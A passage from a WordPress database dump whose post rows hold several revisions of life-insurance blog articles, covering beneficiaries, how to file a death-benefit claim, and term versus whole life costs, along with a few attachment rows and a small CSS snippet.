feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">z</span>\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>Beneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:19:21','2023-03-13 14:19:21','',256,'http://cmdev-site1.com/?p=273',0,'revision','',0),(276,3,'2023-03-13 14:24:38','2023-03-13 14:24:38','<h2><span style=\"color: #ffffff;\">-</span></h2>\r\n<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n\r\n&nbsp;\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:24:38','2023-03-13 14:24:38','',256,'http://cmdev-site1.com/?p=276',0,'revision','',0),(277,3,'2023-03-13 14:25:51','2023-03-13 14:25:51','<h2><span style=\"color: #ffffff;\">-</span></h2>\r\n<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n\r\n&nbsp;\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:25:51','2023-03-13 14:25:51','',256,'http://cmdev-site1.com/?p=277',0,'revision','',0),(278,3,'2023-03-13 14:40:27','2023-03-13 14:40:27','<h2><span style=\"color: #ffffff;\">-</span>\r\n<strong>What is a Beneficiary?</strong></h2>\r\nIn the world of insurance, a life insurance beneficiary is the person, people, or organization receiving your death benefit in the event that you die while your policy is active.\r\n\r\nThis recipient can be a spouse, child, friend, or charity.\r\n<h2><strong>Who Can be a Beneficiary?</strong></h2>\r\nGenerally speaking, no one can tell you who your beneficiary should be. A beneficiary can be a person, charity, business, or trust. In the event the beneficiary is a person, you can choose a spouse, relative, friend, or anyone else you happen to know. You may also choose more than one beneficiary.\r\n\r\nHowever, you’ll want to pay particular attention to certain regulations if you live in a common property state like Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, or Wisconsin.\r\n\r\nIn these states, there might be insurance beneficiary rules that require your spouse to waive their rights as beneficiary before you name another person or organization as your life insurance beneficiary.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>5 Tips for Choosing a Life Insurance Beneficiary</strong></h2>\r\nChoosing a beneficiary doesn’t have to be difficult. If you follow these five tips, you’ll be on the right track to selecting the perfect life insurance beneficiary for you.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3><strong>1. Keep the purpose of the policy in mind</strong></h3>\r\nThe reasons you have for purchasing life insurance will usually be a pretty good guide when it comes to choosing your beneficiary.\r\n\r\nFor example, if you want to protect your family, consider choosing your spouse or child. If you want to preserve your business, consider choosing your business partner.\r\n<h3><strong>2. Know your options</strong></h3>\r\nA lot of people think they can only choose a spouse or children as their beneficiary, but that isn’t entirely true. Get to know your options; you may find the right beneficiary outside your immediate circle.\r\n<h3><strong>3. Have a beneficiary backup</strong></h3>\r\nEven if your beneficiary knows they’re in your life insurance policy, you may have trouble reaching them when needed.\r\n\r\nMake sure your attorney has their information, and if your beneficiary can’t be contacted at your time of death, make sure you have a backup beneficiary ready, ensuring your death benefits go to the right place.\r\n<h3><strong>4. Keep your beneficiaries up-to-date</strong></h3>\r\nOne of the biggest oversights with life insurance policies is not keeping the beneficiaries up to date.\r\n\r\nBe sure to keep your insurance provider and attorney updated with your beneficiary’s most recent contact information and mailing address, make sure to inform your attorney and insurance provider any time it changes.\r\n<h3><strong>5. Avoid designating a minor as a beneficiary</strong></h3>\r\nYou know those state regulations we talked about earlier? They can make matters infinitely more difficult when designating a minor as a beneficiary.\r\n\r\nIn fact, some states don’t allow minors to receive the full amount of benefits from life insurance proceeds – or any proceeds at all.\r\n\r\nOne way to avoid this is by setting up a trust for your child or designating an adult to oversee the distribution of funds from the death benefit to your child.\r\n\r\nUnderstanding who can be a life insurance beneficiary and how to choose one can help make one of the most stressful aspects of your life insurance journey much easier.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','Can A Life Insurance Beneficiary Be Anyone?','','publish','open','open','','can-a-life-insurance-beneficiary-be-anyone','','','2023-03-19 17:46:22','2023-03-19 17:46:22','',0,'http://cmdev-site1.com/?p=278',0,'post','',0),(416,3,'2023-03-21 13:01:46','0000-00-00 00:00:00','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nWhole life, term life...what’s the difference? Many consumers draw a blank when it comes to identifying the differences between these two common types of life insurance. What may be even more confusing?\r\n\r\nKnowing how much you might pay for one type of insurance over the other.\r\n\r\nIn this article, we’ll explore the differences between whole life insurance and term life insurance and the cost differences between them.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What is the Difference Between Term and Whole Life Insurance?</h3>\r\nTerm life insurance covers the insured for a specified length of time. The timeframe of coverage varies from policy to policy.\r\n\r\nWhole life insurance covers the insured for the length of their life—given that premiums are paid and other terms of the policy are met. Rather than protecting you up to a certain age or for a certain length of time as term life insurance does, a whole life policy wouldn’t necessarily expire just because you’ve reached a certain age or a certain amount of time has elapsed.\r\n\r\nWhether you choose a term life policy or a whole life policy depends on a number of factors and your personal needs when it comes to protection.\r\n\r\nWhen weighing the options between the two, it’s best to reach out to your financial advisor or a life insurance agent for more specific guidance.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What are the Benefits of Each?</h3>\r\nAlthough term life policies are for a specified length of time, in some cases the insured may have the option to either renew the policy or convert it into a whole life policy in the event the term passes without the insured’s death.\r\n\r\nThis new policy may be subject to new terms, coverage, and premium rates. This depends on the insurance carrier and the specific terms of coverage in the policy.\r\n\r\nOne popular benefit of a whole life policy is cash value, which is the monetary amount that accumulates as the policy matures over time. This benefit is separate from the death benefit beneficiaries receive once the insured passes away.\r\n\r\nThe cash value is a fund the insured can tap into as a withdrawal of funds or a loan against the policy. The policyholder can use this benefit while they are living, depending on the specific rules of the policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What’s the Price Difference?</h3>\r\nGenerally speaking, whole life insurance policy premiums are often more expensive than term life policies, even for the same amount of face-value coverage.\r\n\r\nThe primary reason is that term life coverage is for a specified length of time, rather than for the life of the insured (with specific stipulations) as is the case with whole life insurance.\r\n\r\nThe dollar amount you can pay will vary from policy to policy, so it’s important to look at all the benefits, term limits, and other details of individual policies that are important to you and your family when it comes to protection.\r\n\r\nChoosing the right, most cost-effective life insurance policy can be a daunting task for many consumers. That’s why it’s important to know what cost considerations and policy benefits you may face when you choose one policy type over another.\r\n\r\nBe sure to consult with a financial advisor or life insurance agent or consult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">email</a> us for more help determining the right type of coverage for you.','How Much Should I Pay For Whole Life Insurance vs Term Life Insurance?','','draft','open','open','','','','','2023-03-21 13:01:46','2023-03-21 13:01:46','',0,'http://cmdev-site1.com/?p=416',0,'post','',0),(280,3,'2023-03-13 14:35:26','2023-03-13 14:35:26','Life insurance concept','Life insurance concept','','inherit','open','closed','','life-insurance-concept','','','2023-03-13 14:35:51','2023-03-13 14:35:51','',278,'http://cmdev-site1.com/wp-content/uploads/2023/03/Life-insurance-heart-concept-1000x712-1.jpg',0,'attachment','image/jpeg',0),(281,3,'2023-03-13 14:35:32','2023-03-13 14:35:32','Life insurance policy with a pen','Life insurance policy','','inherit','open','closed','','life-insurance-policy','','','2023-03-21 13:59:52','2023-03-21 13:59:52','',278,'http://cmdev-site1.com/wp-content/uploads/2023/03/Life-insurance-policy-1000x564-1.jpg',0,'attachment','image/jpeg',0),(282,1,'2023-03-13 14:35:43','2023-03-13 14:35:43','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-13 14:35:43','2023-03-13 14:35:43','',35,'http://cmdev-site1.com/?p=282',0,'revision','',0),(283,3,'2023-03-13 14:36:00','2023-03-13 14:36:00','<h2><span style=\"color: #ffffff;\">-</span>\r\n<strong>What is a Beneficiary?</strong></h2>\r\nIn the world of insurance, a life insurance beneficiary is the person, people, or organization receiving your death benefit in the event that you die while your policy is active.\r\n\r\nThis recipient can be a spouse, child, friend, or charity.\r\n<h2><strong>Who Can be a Beneficiary?</strong></h2>\r\nGenerally speaking, no one can tell you who your beneficiary should be. A beneficiary can be a person, charity, business, or trust. In the event the beneficiary is a person, you can choose a spouse, relative, friend, or anyone else you happen to know. You may also choose more than one beneficiary.\r\n\r\nHowever, you’ll want to pay particular attention to certain regulations if you live in a common property state like Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, or Wisconsin.\r\n\r\nIn these states, there might be insurance beneficiary rules that require your spouse to waive their rights as beneficiary before you name another person or organization as your life insurance beneficiary.\r\n<h2><strong>5 Tips for Choosing a Life Insurance Beneficiary</strong></h2>\r\nChoosing a beneficiary doesn’t have to be difficult. If you follow these five tips, you’ll be on the right track to selecting the perfect life insurance beneficiary for you.\r\n<h3><strong>1. Keep the purpose of the policy in mind</strong></h3>\r\nThe reasons you have for purchasing life insurance will usually be a pretty good guide when it comes to choosing your beneficiary. For example, if you want to protect your family, consider choosing your spouse or child. If you want to preserve your business, consider choosing your business partner.\r\n<h3>\r\n<strong>2. Know your options</strong></h3>\r\nA lot of people think they can only choose a spouse or children as their beneficiary, but that isn’t entirely true. Get to know your options, you may find the right beneficiary outside your immediate circle.\r\n<h3>\r\n<strong>3. Have a beneficiary backup</strong></h3>\r\nEven if your beneficiary knows they’re in your life insurance policy, you may have trouble reaching them when needed. Make sure your attorney has their information, and if your beneficiary can’t be contacted at your time of death, make sure you have a backup beneficiary ready, ensuring your death benefits go to the right place.\r\n<h3>\r\n<strong>4. Keep your beneficiaries up-to-date</strong></h3>\r\nOne of the biggest oversights with life insurance policies is not keeping the beneficiaries up to date. Be sure to keep your insurance provider and attorney updated with your beneficiary’s most recent contact information and mailing address, make sure to inform your attorney and insurance provider any time it changes.\r\n<h3>\r\n<strong>5. Avoid designating a minor as a beneficiary</strong></h3>\r\nYou know those state regulations we talked about earlier? They can make matters infinitely more difficult when designating a minor as a beneficiary. In fact, some states don’t allow minors to receive the full amount of benefits from life insurance proceeds – or any proceeds at all.\r\n\r\nOne way to avoid this is by setting up a trust for your child or designating an adult to oversee the distribution of funds from the death benefit to your child.\r\n\r\nUnderstanding who can be a life insurance beneficiary and how to choose one can help make one of the most stressful aspects of your life insurance journey much easier. For more information on beneficiary rules and regulations in your state, contact a licensed insurance agent.','Can A Life Insurance Beneficiary Be Anyone?','','inherit','closed','closed','','278-revision-v1','','','2023-03-13 14:36:00','2023-03-13 14:36:00','',278,'http://cmdev-site1.com/?p=283',0,'revision','',0),(284,3,'2023-03-13 14:37:48','2023-03-13 14:37:48','<h2><span style=\"color: #ffffff;\">-</span>\r\n<strong>What is a Beneficiary?</strong></h2>\r\nIn the world of insurance, a life insurance beneficiary is the person, people, or organization receiving your death benefit in the event that you die while your policy is active.\r\n\r\nThis recipient can be a spouse, child, friend, or charity.\r\n<h2><strong>Who Can be a Beneficiary?</strong></h2>\r\nGenerally speaking, no one can tell you who your beneficiary should be. A beneficiary can be a person, charity, business, or trust. In the event the beneficiary is a person, you can choose a spouse, relative, friend, or anyone else you happen to know. You may also choose more than one beneficiary.\r\n\r\nHowever, you’ll want to pay particular attention to certain regulations if you live in a common property state like Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, or Wisconsin.\r\n\r\nIn these states, there might be insurance beneficiary rules that require your spouse to waive their rights as beneficiary before you name another person or organization as your life insurance beneficiary.\r\n<h2><strong>5 Tips for Choosing a Life Insurance Beneficiary</strong></h2>\r\nChoosing a beneficiary doesn’t have to be difficult. If you follow these five tips, you’ll be on the right track to selecting the perfect life insurance beneficiary for you.\r\n<h3><strong>1. Keep the purpose of the policy in mind</strong></h3>\r\nThe reasons you have for purchasing life insurance will usually be a pretty good guide when it comes to choosing your beneficiary.\r\n\r\nFor example, if you want to protect your family, consider choosing your spouse or child. If you want to preserve your business, consider choosing your business partner.\r\n<h3>\r\n<strong>2. Know your options</strong></h3>\r\nA lot of people think they can only choose a spouse or children as their beneficiary, but that isn’t entirely true. Get to know your options; you may find the right beneficiary outside your immediate circle.\r\n<h3>\r\n<strong>3. Have a beneficiary backup</strong></h3>\r\nEven if your beneficiary knows they’re in your life insurance policy, you may have trouble reaching them when needed.\r\n\r\nMake sure your attorney has their information, and if your beneficiary can’t be contacted at your time of death, make sure you have a backup beneficiary ready, ensuring your death benefits go to the right place.\r\n<h3>\r\n<strong>4. Keep your beneficiaries up-to-date</strong></h3>\r\nOne of the biggest oversights with life insurance policies is not keeping the beneficiaries up to date.\r\n\r\nBe sure to keep your insurance provider and attorney updated with your beneficiary’s most recent contact information and mailing address, make sure to inform your attorney and insurance provider any time it changes.\r\n<h3>\r\n<strong>5. Avoid designating a minor as a beneficiary</strong></h3>\r\nYou know those state regulations we talked about earlier? They can make matters infinitely more difficult when designating a minor as a beneficiary. In fact, some states don’t allow minors to receive the full amount of benefits from life insurance proceeds – or any proceeds at all.\r\n\r\nOne way to avoid this is by setting up a trust for your child or designating an adult to oversee the distribution of funds from the death benefit to your child.\r\n\r\nUnderstanding who can be a life insurance beneficiary and how to choose one can help make one of the most stressful aspects of your life insurance journey much easier. For more information on beneficiary rules and regulations in your state, contact a licensed insurance agent.','Can A Life Insurance Beneficiary Be Anyone?','','inherit','closed','closed','','278-revision-v1','','','2023-03-13 14:37:48','2023-03-13 14:37:48','',278,'http://cmdev-site1.com/?p=284',0,'revision','',0),(285,3,'2023-03-13 14:38:13','2023-03-13 14:38:13','<h2><span style=\"color: #ffffff;\">-</span>\r\n<strong>What is a Beneficiary?</strong></h2>\r\nIn the world of insurance, a life insurance beneficiary is the person, people, or organization receiving your death benefit in the event that you die while your policy is active.\r\n\r\nThis recipient can be a spouse, child, friend, or charity.\r\n<h2><strong>Who Can be a Beneficiary?</strong></h2>\r\nGenerally speaking, no one can tell you who your beneficiary should be. A beneficiary can be a person, charity, business, or trust. In the event the beneficiary is a person, you can choose a spouse, relative, friend, or anyone else you happen to know. You may also choose more than one beneficiary.\r\n\r\nHowever, you’ll want to pay particular attention to certain regulations if you live in a common property state like Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, or Wisconsin.\r\n\r\nIn these states, there might be insurance beneficiary rules that require your spouse to waive their rights as beneficiary before you name another person or organization as your life insurance beneficiary.\r\n<h2><strong>5 Tips for Choosing a Life Insurance Beneficiary\r\n<span style=\"color: #ffffff;\">-</span></strong></h2>\r\nChoosing a beneficiary doesn’t have to be difficult. If you follow these five tips, you’ll be on the right track to selecting the perfect life insurance beneficiary for you.\r\n<h3><strong>1. Keep the purpose of the policy in mind</strong></h3>\r\nThe reasons you have for purchasing life insurance will usually be a pretty good guide when it comes to choosing your beneficiary.\r\n\r\nFor example, if you want to protect your family, consider choosing your spouse or child. If you want to preserve your business, consider choosing your business partner.\r\n<h3>\r\n<strong>2. Know your options</strong></h3>\r\nA lot of people think they can only choose a spouse or children as their beneficiary, but that isn’t entirely true. Get to know your options; you may find the right beneficiary outside your immediate circle.\r\n<h3>\r\n<strong>3. Have a beneficiary backup</strong></h3>\r\nEven if your beneficiary knows they’re in your life insurance policy, you may have trouble reaching them when needed.\r\n\r\nMake sure your attorney has their information, and if your beneficiary can’t be contacted at your time of death, make sure you have a backup beneficiary ready, ensuring your death benefits go to the right place.\r\n<h3>\r\n<strong>4. Keep your beneficiaries up-to-date</strong></h3>\r\nOne of the biggest oversights with life insurance policies is not keeping the beneficiaries up to date.\r\n\r\nBe sure to keep your insurance provider and attorney updated with your beneficiary’s most recent contact information and mailing address, make sure to inform your attorney and insurance provider any time it changes.\r\n<h3>\r\n<strong>5. Avoid designating a minor as a beneficiary</strong></h3>\r\nYou know those state regulations we talked about earlier? They can make matters infinitely more difficult when designating a minor as a beneficiary. In fact, some states don’t allow minors to receive the full amount of benefits from life insurance proceeds – or any proceeds at all.\r\n\r\nOne way to avoid this is by setting up a trust for your child or designating an adult to oversee the distribution of funds from the death benefit to your child.\r\n\r\nUnderstanding who can be a life insurance beneficiary and how to choose one can help make one of the most stressful aspects of your life insurance journey much easier. For more information on beneficiary rules and regulations in your state, contact a licensed insurance agent.','Can A Life Insurance Beneficiary Be Anyone?','','inherit','closed','closed','','278-revision-v1','','','2023-03-13 14:38:13','2023-03-13 14:38:13','',278,'http://cmdev-site1.com/?p=285',0,'revision','',0),(286,3,'2023-03-13 14:38:39','2023-03-13 14:38:39','<h2><span style=\"color: #ffffff;\">-</span>\r\n<strong>What is a Beneficiary?</strong></h2>\r\nIn the world of insurance, a life insurance beneficiary is the person, people, or organization receiving your death benefit in the event that you die while your policy is active.\r\n\r\nThis recipient can be a spouse, child, friend, or charity.\r\n<h2><strong>Who Can be a Beneficiary?</strong></h2>\r\nGenerally speaking, no one can tell you who your beneficiary should be. A beneficiary can be a person, charity, business, or trust. In the event the beneficiary is a person, you can choose a spouse, relative, friend, or anyone else you happen to know. You may also choose more than one beneficiary.\r\n\r\nHowever, you’ll want to pay particular attention to certain regulations if you live in a common property state like Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, or Wisconsin.\r\n\r\nIn these states, there might be insurance beneficiary rules that require your spouse to waive their rights as beneficiary before you name another person or organization as your life insurance beneficiary.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>5 Tips for Choosing a Life Insurance Beneficiary</strong></h2>\r\nChoosing a beneficiary doesn’t have to be difficult. If you follow these five tips, you’ll be on the right track to selecting the perfect life insurance beneficiary for you.\r\n<h3><strong>1. Keep the purpose of the policy in mind</strong></h3>\r\nThe reasons you have for purchasing life 